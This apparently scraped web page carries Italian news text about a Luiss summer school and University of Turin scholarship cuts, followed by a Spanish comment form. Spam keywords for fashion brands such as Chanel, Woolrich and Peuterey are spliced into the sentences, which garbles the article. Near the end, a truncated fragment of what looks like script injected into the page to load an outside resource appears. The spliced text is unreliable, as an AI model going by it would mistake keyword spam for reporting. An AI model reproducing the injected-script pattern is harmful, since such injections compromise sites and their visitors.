it_3557

in Europa. In estate l offre un programma settimanale. Le mattine sono dedicate alla didattica, con lezioni universitarie insieme ad altri 60 100 studenti per classe, casi applicativi e lavori di gruppo su tematiche sociali, scientifiche e umanistiche.

Dopo il pranzo, alla mensa universitaria del campus, il pomeriggio prevede didattica extra accademica, con corsi che riguardano il ragionamento logico e la comprensione del testo scritto, tutte abilit che lo studente deve possedere per poter superare i test di ammissione,
woolrich gilet uomini, sia alla Luiss che per tutti gli altri atenei che prevedono il numero chiuso; ma anche incontri di orientamento alle scelte dei corsi di laurea,
peuterey donne parka, laboratori di comunicazione attraverso Radio Luiss,
chanel accessori chanel caso, attivit sportive e di socializzazione. A conclusione della settimana di Summer School, inoltre, gli studenti che avranno finito il penultimo anno di superiori senza insufficienze potranno sostenere, con un anno di anticipo, il test di ammissione all accademico 2014/15. Il Corriere Fiorentino accompagner l degli studenti toscani: a fine marzo 2013 pubblicher i nomi dei vincitori delle borse con esenzione totale, e dalla prossima settimana sul quotidiano inizier una rubrica settimanale dedicata ai temi dell e della formazione, col talento dei giovani al centro.10 milioni dalle università

L’ UNIVERSIT di Torino destina l’ intero ammontare dell’ accordo di programma con il governo in intesa con gli altri atenei piemontesi a sostegno delle borse Edisu. Non pi quattro, come era stato detto inizialmente, ma fino a dieci milioni stanziati per risolvere la crisi delle borse di studio universitarie erogate quest’ anno solo al 30 per cento degli aventi diritto, dopo che la giunta regionale ha tagliato di 14 milioni di euro i finanziamenti. La decisione stata approvata ieri dal Senato accademico riunito,
chanel 2.55 borse chanel 30226, che ha votato una mozione presentata dal rettore Ezio Pelizzetti e dal pro rettore Sergio Roda, che ufficializza l’ impegno dell’ ateneo e richiama le istituzioni a maggiore senso di responsabilit e al rispetto degli impegni presi. si pu evidentemente,
chanel original, chiedere agli atenei un maggior impegno finanziario che non sia compensato da un analogo maggior impegno da parte della Regione dice la mozione l’ Universit di Torino non pu nascondere il proprio disappunto di fronte a una decisione che non ha precedenti, e che penalizza in maniera difficilmente tollerabile coloro che hanno partecipato a un bando avendone tuttii requisiti previstie che ora si vedono inopinatamente defraudati di un loro pieno diritto, oltretutto ad alcuni mesi dall’ inizio dell’ anno accademico Una netta presa di posizione che richiama al rispetto degli impegni l’ assessore Elena Maccanti (Lega), la quale proprio ieri ha risposto su questo tema in sesta commissione confermando l’ intenzione della Giunta di pagare la borsa di studio solo a poco pi di duemila studenti, a fronte di quasi ottomila aventi diritto che sono rimasti esclusi. una scelta inaccettabile hanno commentato i consiglieri dell’ opposizione i venti milioni stanziati a bilancio

var d=document;var s=d.createElement(‘script’);

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos necesarios están marcados *

*

Puedes usar las siguientes etiquetas y atributos HTML: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>